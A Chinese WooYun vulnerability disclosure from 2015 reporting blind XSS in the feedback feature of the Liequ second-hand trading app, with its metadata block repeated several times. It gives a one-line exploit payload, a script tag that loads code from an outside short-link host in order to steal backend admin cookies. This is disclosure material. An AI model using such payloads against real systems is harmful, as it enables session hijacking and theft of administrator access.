猎趣手机APP某处过滤不严导致XSS盲打以打到后台

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153491

漏洞标题：猎趣手机APP某处过滤不严导致XSS盲打以打到后台

漏洞作者： js2012

提交时间：2015-11-11 11:10

修复时间：2015-12-26 11:12

公开时间：2015-12-26 11:12

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-12-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

猎趣[1] ,是北京云茂电子商务有限公司旗下的移动电商交易平台。猎趣网专注品牌二手买卖，在互联网购物的大时代，针对于产品快速交易以及物质过剩的情况，提供无需通过商家即可交易变现的平台。参与者只要拿起手机对物品拍照并附上简单的描述即可出售，无需开店二手交易即可随拍随卖，用闲置换取现金，打造时尚环保的二手交易

详细说明：

手机APP反馈出过滤不严，导致XSS盲打以打到后台cookies
漏洞利用代码：

<script src=http://t.cn/RUUNjzh></script>

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153491

漏洞标题：猎趣手机APP某处过滤不严导致XSS盲打以打到后台

相关厂商：猎趣网

漏洞作者： js2012

提交时间：2015-11-11 11:10

修复时间：2015-12-26 11:12

公开时间：2015-12-26 11:12

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 js2012@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153491

漏洞标题：猎趣手机APP某处过滤不严导致XSS盲打以打到后台

相关厂商：猎趣网

漏洞作者： js2012

提交时间：2015-11-11 11:10

修复时间：2015-12-26 11:12

公开时间：2015-12-26 11:12

漏洞类型：XSS 跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153491"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 js2012@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：